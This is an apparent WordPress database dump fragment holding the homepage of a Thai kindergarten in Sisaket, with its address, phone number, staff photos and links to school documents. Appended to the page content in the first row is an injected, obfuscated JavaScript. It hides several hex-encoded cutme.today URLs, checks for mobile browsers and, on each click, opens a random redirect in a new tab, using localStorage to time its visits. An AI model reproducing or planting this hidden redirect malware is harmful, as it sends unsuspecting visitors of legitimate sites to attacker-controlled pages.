-->\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d1925.9723083104054!2d104.32273680156584!3d15.106380799999997!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x3116e380deaa317f%3A0x4d9751ab2c19279f!2z4LmC4Lij4LiH4LmA4Lij4Li14Lii4LiZ4Lit4LiZ4Li44Lia4Liy4Lil4Lin4Lix4LiU4Lie4Lij4Liw4LmC4LiVICjguJ3guYjguLLguKLguKHguLHguJjguKLguKEp!5e0!3m2!1sth!2sth!4v1722088475215!5m2!1sth!2sth\" width=\"100%\" height=\"350\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"457aa97e\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingTop\":\"30px\",\"paddingRight\":\"30px\",\"paddingBottom\":\"0px\",\"paddingLeft\":\"30px\",\"paddingTopMobile\":\"40px\",\"paddingRightMobile\":\"15px\",\"paddingBottomMobile\":\"30px\",\"paddingLeftMobile\":\"15px\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"b3723dea\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-b3723dea gb-headline-text\"><strong>โรงเรียนอนุบาลวัดพระโต</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"51a75706\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-51a75706 gb-headline-text\">1193 ถนนขุขันธ์ ตำบลเมืองเหนือ อำเภอเมืองศรีสะเกษ จังหวัดศรีสะเกษ 33000</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"fa4bd31f\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-fa4bd31f gb-headline-text\"><strong>ติดต่อเรา</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e820350\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e820350 gb-headline-text\">โทรศัพท์ : 0-4561-2730</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e95d8cb\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e95d8cb gb-headline-text\"><strong>ติดตามเราได้ที่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2Fprofile.php%3Fid%3D61556083436494&tabs=timeline&width=330&height=80&small_header=true&adapt_container_width=true&hide_cover=true&show_facepile=true&appId\" width=\"330\" height=\"80\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','หน้าแรก','','inherit','closed','closed','','19-revision-v1','','','2024-09-24 11:40:44','2024-09-24 04:40:44','',19,'http://watprato.ssk.in.th/?p=432',0,'revision','',0),
(434,2,'2024-09-24 11:44:06','2024-09-24 04:44:06','<!-- wp:kadence/rowlayout {\"uniqueID\":\"19_238a19-ce\",\"columns\":1,\"colLayout\":\"equal\",\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"19_55c486-08\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column19_55c486-08\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"afb41c1a\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f1b9a3f2\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"41ac449a\",\"mediaId\":85,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-41ac449a\"><img class=\"gb-image gb-image-41ac449a\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/awpt.gif\" alt=\"\" title=\"awpt\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f8167df0\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":46,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/นายอนุศักดิ์-พันธ์งาม-png.png\" alt=\"\" title=\"นายอนุศักดิ์ พันธ์งาม png\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:generateblocks/image {\"uniqueId\":\"f67ede92\",\"mediaId\":406,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-f67ede92\"><img class=\"gb-image gb-image-f67ede92\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/รองผู้อำนวยการ1.jpg\" alt=\"\" title=\"รองผู้อำนวยการ1\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:group {\"fontSize\":\"small\",\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group has-small-font-size\"><!-- wp:generateblocks/container {\"uniqueId\":\"36016ef6\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"e194b6ce\",\"mediaId\":401,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-e194b6ce\"><img class=\"gb-image gb-image-e194b6ce\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/รองผู้อำนวยการ3.jpg\" alt=\"\" title=\"รองผู้อำนวยการ3\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:generateblocks/image {\"uniqueId\":\"3791db60\",\"mediaId\":404,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-3791db60\"><img class=\"gb-image gb-image-3791db60\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/รองผู้อำนวยการ2-1.jpg\" alt=\"\" title=\"รองผู้อำนวยการ2\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container --></div>\n<!-- /wp:group -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"19_66bc98-69\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns19_66bc98-69\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"19_3d590e-59\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\\u003cbr\\u003eรองผู้อำนวยการโรงเรียน\",\"link\":\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=share_link\",\"sizePreset\":\"small\",\"background\":\"#cf2e2e\",\"backgroundHover\":\"#f78da7\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"19_c72802-2d\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items19_c72802-2d kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"19_3cadef-91\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_3cadef-91\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1QO7vaeEKkhB3kDmvrrIdBi3qQkJ8oya1/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1QO7vaeEKkhB3kDmvrrIdBi3qQkJ8oya1/view?usp=sharing\">ประวัติโรงเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_d4147b-0f\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_d4147b-0f\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1j7kEi4hP1hbBIpZn7oJTgY-nHJ1PJQLs/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1j7kEi4hP1hbBIpZn7oJTgY-nHJ1PJQLs/view?usp=drive_link\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_41d84f-8e\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_41d84f-8e\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/180gGIRpJLJ6MXT59TBBckEoyMyJ0syro/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/180gGIRpJLJ6MXT59TBBckEoyMyJ0syro/view?usp=drive_link\">กรรมการสถานศึกษา</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_17cef9-da\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_17cef9-da\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1WayPS34cjiQafz8cVXMrSwi14axv8wNL/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1WayPS34cjiQafz8cVXMrSwi14axv8wNL/view?usp=sharing\">ข้อมูลผู้บริหาร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_a997a3-5a\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_a997a3-5a\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1KNY_0cfvU0tSAr568ZHSWspTl7t86-R6/view?usp=sharing\" data-type=\"page\" data-id=\"19\">ข้อมูลบุคลากร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_13660f-b9\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_13660f-b9\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1aH-777mmqYYRu0vbttHBA-BPqFi1gHG0/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1aH-777mmqYYRu0vbttHBA-BPqFi1gHG0/view?usp=sharing\">ข้อมูลนักเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_702c0e-e7\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_702c0e-e7\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/186unqENq5e2LLT2RUUIKpNMW3wPkg8bA/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/186unqENq5e2LLT2RUUIKpNMW3wPkg8bA/view?usp=drive_link\">ข้อมูล O-NET</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_0109ca-f6\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_0109ca-f6\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://eita.ssk.in.th/eit_admin.php\" data-type=\"link\" data-id=\"http://eita.ssk.in.th/eit_admin.php\">แบบวัดการรับรู้ EIT (2</a>)</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_b4c32e-bd\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_b4c32e-bd\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><img class=\"wp-image-200\" style=\"width: 150px;\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/08/EIT_QRCode-1.png\" alt=\"\"></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container 